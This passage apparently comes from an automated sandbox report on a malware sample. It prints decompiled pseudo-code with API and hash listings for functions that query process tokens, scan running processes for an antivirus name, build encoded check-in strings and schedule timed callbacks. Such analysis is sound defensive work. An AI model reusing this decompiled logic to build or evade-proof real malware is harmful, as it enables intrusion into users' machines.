                                					_t33 =  &_v8;
                                					__imp__(_v12, 8, _t33);
                                					if(_t33 >= 0) {
                                						_t47 = __imp__;
                                						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                						_t44 = E04616837(_a4);
                                						if(_t44 != 0) {
                                							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                							if(_t40 >= 0) {
                                								memcpy(_a8,  *_t44, 0x1c);
                                								_t48 = 1;
                                							}
                                							E046150CA(_t44);
                                						}
                                						NtClose(_v8); // executed
                                					}
                                					NtClose(_v12);
                                				}
                                				return _t48;
                                			}

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04612D4D
                                • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 04612D60
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04612D7C
                                  • Part of subcall function 04616837: RtlAllocateHeap.NTDLL(00000000,00000000,04614197), ref: 04616843
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04612D99
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04612DA6
                                • NtClose.NTDLL(00000000), ref: 04612DB8
                                • NtClose.NTDLL(00000000), ref: 04612DC2
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 2e8b8674d019e64028a06d9df77d273946c1e232a086e2d3dfc851c4848c1e5c
                                • Instruction ID: 3eb8c99f1feaef25ef72a1d894debf9b3a022b21ca22a65ccc57c476c71a319f
                                • Opcode Fuzzy Hash: 2e8b8674d019e64028a06d9df77d273946c1e232a086e2d3dfc851c4848c1e5c
                                • Instruction Fuzzy Hash: F32105B2900218BBDB01AFA4CC45DDEBFBDEF09B50F144066F905A6160E7719A84DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E0461513E() {
                                				char _v264;
                                				void* _v300;
                                				void* _t5;
                                				int _t8;
                                				intOrPtr _t9;
                                				int _t15;
                                				void* _t17;
                                
                                				_t15 = 0;
                                				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
                                				_t17 = _t5;
                                				if(_t17 != 0) {
                                					_t8 = Process32First(_t17,  &_v300); // executed
                                					while(_t8 != 0) {
                                						_t9 =  *0x461a2d4; // 0xdad5a8
                                						_t2 = _t9 + 0x461bdd4; // 0x73617661
                                						if(StrStrIA( &_v264, _t2) != 0) {
                                							_t15 = 1;
                                						} else {
                                							_t8 = Process32Next(_t17,  &_v300); // executed
                                							continue;
                                						}
                                						L7:
                                						FindCloseChangeNotification(_t17); // executed
                                						goto L8;
                                					}
                                					goto L7;
                                				}
                                				L8:
                                				return _t15;
                                			}

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0461514E
                                • Process32First.KERNEL32(00000000,?), ref: 04615161
                                • StrStrIA.SHLWAPI(?,73617661,00000000,00000000), ref: 0461517B
                                • Process32Next.KERNEL32(00000000,?), ref: 0461518D
                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0461519C
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                • String ID:
                                • API String ID: 3243318325-0
                                • Opcode ID: 79ddc82f9403d6fe1fe30c13ebd7ca3d336cbab640e7a6277a5a4c02c6054f3a
                                • Instruction ID: 6556a77001958a678cc955f20d3ed98ed86da5852fbceaf7aacb134489a0df85
                                • Opcode Fuzzy Hash: 79ddc82f9403d6fe1fe30c13ebd7ca3d336cbab640e7a6277a5a4c02c6054f3a
                                • Instruction Fuzzy Hash: 5BF0BB7560112476E722EA769C4ADEBB7ACDBC4718F0C0166ED46C3120FA34ED468AA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 77%
                                			E046146D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                				void* _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* __ebx;
                                				void* __edi;
                                				long _t63;
                                				intOrPtr _t64;
                                				intOrPtr _t65;
                                				intOrPtr _t66;
                                				intOrPtr _t67;
                                				intOrPtr _t68;
                                				void* _t71;
                                				intOrPtr _t72;
                                				int _t75;
                                				void* _t76;
                                				intOrPtr _t77;
                                				intOrPtr _t81;
                                				intOrPtr _t85;
                                				intOrPtr _t86;
                                				void* _t88;
                                				void* _t91;
                                				intOrPtr _t95;
                                				intOrPtr _t99;
                                				intOrPtr* _t101;
                                				void* _t102;
                                				void* _t107;
                                				intOrPtr _t111;
                                				signed int _t115;
                                				char** _t117;
                                				int _t120;
                                				signed int _t122;
                                				intOrPtr* _t123;
                                				intOrPtr* _t125;
                                				intOrPtr* _t127;
                                				intOrPtr* _t129;
                                				intOrPtr _t132;
                                				intOrPtr _t135;
                                				int _t138;
                                				intOrPtr _t139;
                                				int _t142;
                                				void* _t143;
                                				void* _t144;
                                				void* _t154;
                                				int _t157;
                                				void* _t158;
                                				void* _t159;
                                				void* _t160;
                                				intOrPtr _t161;
                                				void* _t163;
                                				long _t167;
                                				intOrPtr* _t168;
                                				intOrPtr* _t171;
                                				void* _t172;
                                				void* _t174;
                                				void* _t175;
                                				void* _t180;
                                
                                				_t154 = __edx;
                                				_t144 = __ecx;
                                				_t63 = __eax;
                                				_t143 = _a20;
                                				_a20 = 8;
                                				if(__eax == 0) {
                                					_t63 = GetTickCount();
                                				}
                                				_t64 =  *0x461a018; // 0x4934a3dd
                                				asm("bswap eax");
                                				_t65 =  *0x461a014; // 0x5cb11ae7
                                				asm("bswap eax");
                                				_t66 =  *0x461a010; // 0x15dc9586
                                				asm("bswap eax");
                                				_t67 =  *0x461a00c; // 0x69ab8210
                                				asm("bswap eax");
                                				_t68 =  *0x461a2d4; // 0xdad5a8
                                				_t3 = _t68 + 0x461b613; // 0x74666f73
                                				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x461a02c,  *0x461a004, _t63);
                                				_t71 = E04616A09();
                                				_t72 =  *0x461a2d4; // 0xdad5a8
                                				_t4 = _t72 + 0x461b653; // 0x74707526
                                				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
                                				_t174 = _t172 + 0x38;
                                				_t158 = _t157 + _t75;
                                				if(_a8 != 0) {
                                					_t139 =  *0x461a2d4; // 0xdad5a8
                                					_t8 = _t139 + 0x461b65e; // 0x732526
                                					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
                                					_t174 = _t174 + 0xc;
                                					_t158 = _t158 + _t142;
                                				}
                                				_t76 = E04615040(_t144);
                                				_t77 =  *0x461a2d4; // 0xdad5a8
                                				_t10 = _t77 + 0x461b302; // 0x6d697426
                                				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
                                				_t81 =  *0x461a2d4; // 0xdad5a8
                                				_t12 = _t81 + 0x461b7aa; // 0x53c8d52
                                				_t180 = _a4 - _t12;
                                				_t14 = _t81 + 0x461b2d7; // 0x74636126
                                				_t156 = 0 | _t180 == 0x00000000;
                                				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
                                				_t85 =  *0x461a31c; // 0x53c95e0
                                				_t175 = _t174 + 0x1c;
                                				if(_t85 != 0) {
                                					_t135 =  *0x461a2d4; // 0xdad5a8
                                					_t18 = _t135 + 0x461b8da; // 0x3d736f26
                                					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
                                					_t175 = _t175 + 0xc;
                                					_t160 = _t160 + _t138;
                                				}
                                				_t86 =  *0x461a32c; // 0x53c95b0
                                				if(_t86 != 0) {
                                					_t132 =  *0x461a2d4; // 0xdad5a8
                                					_t20 = _t132 + 0x461b676; // 0x73797326
                                					wsprintfA(_t160 + _t143, _t20, _t86);
                                					_t175 = _t175 + 0xc;
                                				}
                                				_t161 =  *0x461a37c; // 0x53c9630
                                				_t88 = E04612885(0x461a00a, _t161 + 4);
                                				_t167 = 0;
                                				_v12 = _t88;
                                				if(_t88 == 0) {
                                					L28:
                                					RtlFreeHeap( *0x461a290, _t167, _t143); // executed
                                					return _a20;
                                				} else {
                                					_t91 = RtlAllocateHeap( *0x461a290, 0, 0x800);
                                					_a8 = _t91;
                                					if(_t91 == 0) {
                                						L27:
                                						HeapFree( *0x461a290, _t167, _v12);
                                						goto L28;
                                					}
                                					E04612DD0(GetTickCount());
                                					_t95 =  *0x461a37c; // 0x53c9630
                                					__imp__(_t95 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t99 =  *0x461a37c; // 0x53c9630
                                					__imp__(_t99 + 0x40);
                                					_t101 =  *0x461a37c; // 0x53c9630
                                					_t102 = E0461624D(1, _t156, _t143,  *_t101); // executed
                                					_t163 = _t102;
                                					_v20 = _t163;
                                					asm("lock xadd [eax], ecx");
                                					if(_t163 == 0) {
                                						L26:
                                						HeapFree( *0x461a290, _t167, _a8);
                                						goto L27;
                                					}
                                					StrTrimA(_t163, 0x46192ac);
                                					_push(_t163);
                                					_t107 = E046121C1();
                                					_v8 = _t107;
                                					if(_t107 == 0) {
                                						L25:
                                						HeapFree( *0x461a290, _t167, _t163);
                                						goto L26;
                                					}
                                					 *_t163 = 0;
                                					__imp__(_a8, _v12);
                                					_t168 = __imp__;
                                					 *_t168(_a8, _v8);
                                					_t111 = E04614AA6( *_t168(_a8, _t163), _a8);
                                					_a4 = _t111;
                                					if(_t111 == 0) {
                                						_a20 = 8;
                                						L23:
                                						E04611492();
                                						L24:
                                						HeapFree( *0x461a290, 0, _v8);
                                						_t167 = 0;
                                						goto L25;
                                					}
                                					_t115 = E046126C9(_t143, 0xffffffffffffffff, _t163,  &_v16); // executed
                                					_a20 = _t115;
                                					if(_t115 == 0) {
                                						_t171 = _v16;
                                						_t122 = E0461161A(_t171, _a4, _a12, _a16); // executed
                                						_a20 = _t122;
                                						_t123 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                						_t125 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                						_t127 =  *((intOrPtr*)(_t171 + 4));
                                						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                						_t129 =  *_t171;
                                						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                						E046150CA(_t171);
                                					}
                                					if(_a20 != 0x10d2) {
                                						L18:
                                						if(_a20 == 0) {
                                							_t117 = _a12;
                                							if(_t117 != 0) {
                                								_t164 =  *_t117;
                                								_t169 =  *_a16;
                                								wcstombs( *_t117,  *_t117,  *_a16);
                                								_t120 = E0461580E(_t164, _t164, _t169 >> 1);
                                								_t163 = _v20;
                                								 *_a16 = _t120;
                                							}
                                						}
                                						goto L21;
                                					} else {
                                						if(_a12 != 0) {
                                							L21:
                                							E046150CA(_a4);
                                							if(_a20 == 0 || _a20 == 0x10d2) {
                                								goto L24;
                                							} else {
                                								goto L23;
                                							}
                                						}
                                						_a20 = _a20 & 0x00000000;
                                						goto L18;
                                					}
                                				}
                                			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 046146E8
                                • wsprintfA.USER32 ref: 04614735
                                • wsprintfA.USER32 ref: 04614752
                                • wsprintfA.USER32 ref: 04614772
                                • wsprintfA.USER32 ref: 04614790
                                • wsprintfA.USER32 ref: 046147B3
                                • wsprintfA.USER32 ref: 046147D4
                                • wsprintfA.USER32 ref: 046147F4
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04614825
                                • GetTickCount.KERNEL32 ref: 04614836
                                • RtlEnterCriticalSection.NTDLL(053C95F0), ref: 0461484A
                                • RtlLeaveCriticalSection.NTDLL(053C95F0), ref: 04614868
                                  • Part of subcall function 0461624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616278
                                  • Part of subcall function 0461624D: lstrlen.KERNEL32(00000000,?,00000000,046170D9,00000000,053C9630), ref: 04616280
                                  • Part of subcall function 0461624D: strcpy.NTDLL ref: 04616297
                                  • Part of subcall function 0461624D: lstrcat.KERNEL32(00000000,00000000), ref: 046162A2
                                  • Part of subcall function 0461624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,046170D9,?,00000000,046170D9,00000000,053C9630), ref: 046162BF
                                • StrTrimA.SHLWAPI(00000000,046192AC,?,053C9630), ref: 0461489D
                                  • Part of subcall function 046121C1: lstrlen.KERNEL32(053C87FA,00000000,00000000,00000000,04617100,00000000), ref: 046121D1
                                  • Part of subcall function 046121C1: lstrlen.KERNEL32(?), ref: 046121D9
                                  • Part of subcall function 046121C1: lstrcpy.KERNEL32(00000000,053C87FA), ref: 046121ED
                                  • Part of subcall function 046121C1: lstrcat.KERNEL32(00000000,?), ref: 046121F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 046148BD
                                • lstrcat.KERNEL32(00000000,?), ref: 046148CF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 046148D5
                                  • Part of subcall function 04614AA6: lstrlen.KERNEL32(?,00000000,053C9C98,74ECC740,046113D0,053C9E9D,046155DE,046155DE,?,046155DE,?,63699BC3,E8FA7DD7,00000000), ref: 04614AAD
                                  • Part of subcall function 04614AA6: mbstowcs.NTDLL ref: 04614AD6
                                  • Part of subcall function 04614AA6: memset.NTDLL ref: 04614AE8
                                • wcstombs.NTDLL ref: 04614966
                                  • Part of subcall function 0461161A: SysAllocString.OLEAUT32(00000000), ref: 0461165B
                                  • Part of subcall function 0461161A: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 046116DD
                                  • Part of subcall function 0461161A: StrStrIW.SHLWAPI(00000000,006E0069), ref: 0461171C
                                  • Part of subcall function 046150CA: RtlFreeHeap.NTDLL(00000000,00000000,04614239,00000000,00000001,?,00000000,?,?,?,04616B8D,00000000,?,00000001), ref: 046150D6
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 046149A7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 046149B7
                                • HeapFree.KERNEL32(00000000,00000000,?,053C9630), ref: 046149C7
                                • HeapFree.KERNEL32(00000000,?), ref: 046149D7
                                • RtlFreeHeap.NTDLL(00000000,?), ref: 046149E5
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 2871901346-0
                                • Opcode ID: 00c7e6f18564e1f4d20e0a49636c79d3bc268f2a0d67ceea5df1ca498a14fb95
                                • Instruction ID: 8e4828e00fc0be5b178a59af927bb6dc700a06c13eef107ab739f6b59a57ba71
                                • Opcode Fuzzy Hash: 00c7e6f18564e1f4d20e0a49636c79d3bc268f2a0d67ceea5df1ca498a14fb95
                                • Instruction Fuzzy Hash: 30A16C71601109AFDB11DFA8DC88EAA3BB8EF48755B1D4026F409C7271EB39E954CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 83%
                                			E04612022(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                				struct %anon52 _v8;
                                				long _v12;
                                				char _v16;
                                				char _v20;
                                				signed int _v24;
                                				intOrPtr _v32;
                                				union _LARGE_INTEGER _v36;
                                				intOrPtr _v40;
                                				void* _v44;
                                				void _v88;
                                				char _v92;
                                				struct %anon52 _t46;
                                				intOrPtr _t51;
                                				long _t53;
                                				void* _t54;
                                				struct %anon52 _t61;
                                				long _t65;
                                				signed int _t66;
                                				long _t68;
                                				void* _t69;
                                				void* _t71;
                                				signed int _t72;
                                				intOrPtr _t74;
                                				intOrPtr _t76;
                                				void** _t78;
                                				void* _t80;
                                
                                				_t74 = __edx;
                                				_v92 = 0;
                                				memset( &_v88, 0, 0x2c);
                                				_t46 = CreateWaitableTimerA(0, 1, 0);
                                				_v44 = _t46;
                                				if(_t46 == 0) {
                                					_v8.LowPart = GetLastError();
                                				} else {
                                					_push(0xffffffff);
                                					_push(0xff676980);
                                					_push(0);
                                					_push( *0x461a298);
                                					_v20 = 0;
                                					_v16 = 0;
                                					L04617D8C();
                                					_v36.LowPart = _t46;
                                					_v32 = _t74;
                                					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                					_t51 =  *0x461a2c4; // 0x2fc
                                					_v40 = _t51;
                                					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                					_v8.LowPart = _t53;
                                					if(_t53 == 0) {
                                						if(_a8 != 0) {
                                							L4:
                                							 *0x461a2a4 = 5;
                                						} else {
                                							_t69 = E04611AB8(_t74); // executed
                                							if(_t69 != 0) {
                                								goto L4;
                                							}
                                						}
                                						_v12 = 0;
                                						L6:
                                						L6:
                                						if(_v12 == 1 && ( *0x461a2b8 & 0x00000001) == 0) {
                                							_v12 = 2;
                                						}
                                						_t72 = _v12;
                                						_t58 = _t72 << 4;
                                						_t76 = _t80 + (_t72 << 4) - 0x54;
                                						_t73 = _t72 + 1;
                                						_v24 = _t72 + 1;
                                						_t61 = E04615F9A( &_v20, _t73, _t76, _t73, _t80 + _t58 - 0x58, _t76,  &_v16); // executed
                                						_v8.LowPart = _t61;
                                						if(_t61 != 0) {
                                							goto L17;
                                						}
                                						_t66 = _v24;
                                						_t90 = _t66 - 3;
                                						_v12 = _t66;
                                						if(_t66 != 3) {
                                							goto L6;
                                						} else {
                                							_t68 = E04613032(_t73, _t90,  &_v92, _a4, _a8); // executed
                                							_v8.LowPart = _t68;
                                						}
                                						goto L12;
                                						L17:
                                						__eflags = _t61 - 0x10d2;
                                						if(_t61 != 0x10d2) {
                                							_push(0xffffffff);
                                							_push(0xff676980);
                                							_push(0);
                                							_push( *0x461a29c);
                                							goto L21;
                                						} else {
                                							__eflags =  *0x461a2a0; // 0xa
                                							if(__eflags == 0) {
                                								goto L12;
                                							} else {
                                								_t61 = E04611492();
                                								_push(0xffffffff);
                                								_push(0xdc3cba00);
                                								_push(0);
                                								_push( *0x461a2a0);
                                								L21:
                                								L04617D8C();
                                								_v36.LowPart = _t61;
                                								_v32 = _t76;
                                								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                								_t65 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                								__eflags = _t65;
                                								_v8.LowPart = _t65;
                                								if(_t65 == 0) {
                                									goto L6;
                                								} else {
                                									goto L12;
                                								}
                                							}
                                						}
                                						L25:
                                					}
                                					L12:
                                					_t78 =  &_v92;
                                					_t71 = 3;
                                					do {
                                						_t54 =  *_t78;
                                						if(_t54 != 0) {
                                							HeapFree( *0x461a290, 0, _t54);
                                						}
                                						_t78 =  &(_t78[4]);
                                						_t71 = _t71 - 1;
                                					} while (_t71 != 0);
                                					CloseHandle(_v44);
                                				}
                                				return _v8;
                                				goto L25;
                                			}

                                APIs
                                • memset.NTDLL ref: 04612037
                                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04612043
                                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04612068
                                • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 04612084
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0461209D
                                • HeapFree.KERNEL32(00000000,00000000), ref: 04612132
                                • CloseHandle.KERNEL32(?), ref: 04612141
                                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 0461217B
                                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,0461560C), ref: 04612191
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0461219C
                                  • Part of subcall function 04611AB8: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,053C9308,00000000,?,7519F710,00000000,7519F730), ref: 04611B07
                                  • Part of subcall function 04611AB8: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,053C9340,?,00000000,30314549,00000014,004F0053,053C92FC), ref: 04611BA4
                                  • Part of subcall function 04611AB8: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,046120B0), ref: 04611BB6
                                • GetLastError.KERNEL32 ref: 046121AE
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                • String ID:
                                • API String ID: 3521023985-0
                                • Opcode ID: 090ff3761b7b33a155122a0c62737b45a10c2cf664cf6753b7d960ba91dcaedc
                                • Instruction ID: 6bd97e2d89e38d6b91af3665c1fd9f834732050053eed5a7c384a4271a2daf1d
                                • Opcode Fuzzy Hash: 090ff3761b7b33a155122a0c62737b45a10c2cf664cf6753b7d960ba91dcaedc
                                • Instruction Fuzzy Hash: 75516EB1901228AEDF11DFD4DC44DEEBFB9EF05725F184256F610B22A0E775AA44CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 74%
                                			E04616384(intOrPtr __edx, void** _a4, void** _a8) {
                                				intOrPtr _v8;
                                				struct _FILETIME* _v12;
                                				short _v56;
                                				struct _FILETIME* _t12;
                                				intOrPtr _t13;
                                				void* _t17;
                                				void* _t21;
                                				intOrPtr _t27;
                                				long _t28;
                                				void* _t30;
                                
                                				_t27 = __edx;
                                				_t12 =  &_v12;
                                				GetSystemTimeAsFileTime(_t12);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v8);
                                				_push(_v12);
                                				L04617D86();
                                				_push(_t12);
                                				_v12 = _t12;
                                				_t13 =  *0x461a2d4; // 0xdad5a8
                                				_t5 = _t13 + 0x461b8a2; // 0x53c8e4a
                                				_t6 = _t13 + 0x461b57c; // 0x530025
                                				_push(0x16);
                                				_push( &_v56);
                                				_v8 = _t27;
                                				L04617A6A();
                                				_t17 = CreateFileMappingW(0xffffffff, 0x461a2f8, 4, 0, 0x1000,  &_v56); // executed
                                				_t30 = _t17;
                                				if(_t30 == 0) {
                                					_t28 = GetLastError();
                                				} else {
                                					if(GetLastError() == 0xb7) {
                                						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                                						if(_t21 == 0) {
                                							_t28 = GetLastError();
                                							if(_t28 != 0) {
                                								goto L6;
                                							}
                                						} else {
                                							 *_a4 = _t30;
                                							 *_a8 = _t21;
                                							_t28 = 0;
                                						}
                                					} else {
                                						_t28 = 2;
                                						L6:
                                						CloseHandle(_t30);
                                					}
                                				}
                                				return _t28;
                                			}

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,04615488,?,00000001,?), ref: 04616390
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 046163A6
                                • _snwprintf.NTDLL ref: 046163CB
                                • CreateFileMappingW.KERNELBASE(000000FF,0461A2F8,00000004,00000000,00001000,?), ref: 046163E7
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04615488,?), ref: 046163F9
                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 04616410
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04615488), ref: 04616431
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,04615488,?), ref: 04616439
                                Memory Dump Source
                                • Source File: 00000003.00000002.490961575.0000000004611000.00000020.00000001.sdmp, Offset: 04610000, based on PE: true
                                • Associated: 00000003.00000002.490944372.0000000004610000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.490983353.0000000004619000.00000002.00000001.sdmp
                                • Associated: 00000003.00000002.490993986.000000000461A000.00000004.00000001.sdmp
                                • Associated: 00000003.00000002.491013996.000000000461C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: dc4ca77e1cac95706672dbc57d89773c476b558954b0420cbb68cf5d3268d219
                                • Instruction ID: 03bc4351a7295014eede3e70271f4459df3918d7446194bf9929bb185f440d55
                                • Opcode Fuzzy Hash: dc4ca77e1cac95706672dbc57d89773c476b558954b0420cbb68cf5d3268d219
                                • Instruction Fuzzy Hash: 4021C3B6A00224BBD711DFA4DC05F9D77A9EB44751F288126F905E72A0FA70AA05CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 64%
                                			E046153F2(signed int __edx) {
                                				signed int _v8;
                                				long _v12;
                                				signed int _v16;
                                				long _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				intOrPtr _v32;
                                				intOrPtr _v36;
                                				char _v40;
                                				void* __edi;
                                				void* __esi;
                                				void* _t27;
                                				long _t28;
                                				long _t31;
                                				intOrPtr _t32;
                                				void* _t36;
                                				signed int _t37;
                                				intOrPtr _t38;
                                				void* _t39;
                                				CHAR* _t42;
                                				long _t48;
                                				long _t49;
                                				void* _t54;
                                				void* _t56;
                                				intOrPtr _t64;
                                				void* _t67;
                                				long _t71;
                                				void* _t72;
                                				signed char _t74;
                                				intOrPtr _t76;
                                				signed int _t77;
                                				long _t82;
                                				long _t84;
                                				CHAR* _t87;
                                				void* _t88;
                                
                                				_t79 = __edx;
                                				_v16 = 0;
                                				_v8 = 0;
                                				_v12 = 0;
                                				_t27 = E046158F8();
                                				if(_t27 != 0) {
                                					_t77 =  *0x461a2b4; // 0x4000000a
                                					_t73 = (_t77 & 0xf0000000) + _t27;
                                					 *0x461a2b4 = (_t77 & 0xf0000000) + _t27;
                                				}
                                				_t28 =  *0x461a148(0, 2); // executed
                                				_v20 = _t28;
                                				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
                                					_t31 = E0461696F( &_v8,  &_v16); // executed
                                					_push(0);
                                					_t84 = _t31;
                                					_t32 =  *0x461a2d4; // 0xdad5a8
                                					_push(0x461a2fc);
                                					_push(1);
                                					_t7 = _t32 + 0x461b5ad; // 0x4d283a53
                                					 *0x461a2f8 = 0xc;
                                					 *0x461a300 = 0;
                                					L04614AF8();
                                					_t36 = E04616384(_t79,  &_v24,  &_v12); // executed
                                					if(_t36 == 0) {
                                						CloseHandle(_v24);
                                					}
                                					if(_t84 != 5) {
                                						_t37 = _v16;
                                						__eflags = _t37;
                                						if(_t37 != 0) {
                                							E04614454(_t37 ^ 0xe8fa7dd7,  &_v40);
                                							_t87 = E04616837(0x27);
                                							__eflags = _t87;
                                							if(_t87 != 0) {
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								asm("bswap eax");
                                								_t64 =  *0x461a2d4; // 0xdad5a8
                                								_t18 = _t64 + 0x461b84f; // 0x78383025
                                								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
                                								_t88 = _t88 + 0x18;
                                							}
                                							 *0x461a32c = _t87;
                                						}
                                						_t38 = E046160E1();
                                						 *0x461a2c8 =  *0x461a2c8 ^ 0xe8fa7dd7;
                                						 *0x461a31c = _t38;
                                						_t39 = E04616837(0x60);
                                						__eflags = _t39;
                                						 *0x461a37c = _t39;
                                						if(_t39 == 0) {
                                							_t84 = 8;
                                						} else {
                                							memset(_t39, 0, 0x60);
                                							_t54 =  *0x461a37c; // 0x53c9630
                                							_t88 = _t88 + 0xc;
                                							__imp__(_t54 + 0x40);
                                							_t56 =  *0x461a37c; // 0x53c9630
                                							 *_t56 = 0x461b83e;
                                							_t84 = 0;
                                						}
                                						__eflags = _t84;
                                						if(_t84 == 0) {
                                							_t42 = RtlAllocateHeap( *0x461a290, _t84, 0x43);
                                							__eflags = _t42;
                                							 *0x461a314 = _t42;
                                							if(_t42 == 0) {
                                								_t84 = 8;
                                							} else {
                                								_t74 =  *0x461a2b4; // 0x4000000a
                                								_t79 = _t74 & 0x000000ff;
                                								_t76 =  *0x461a2d4; // 0xdad5a8
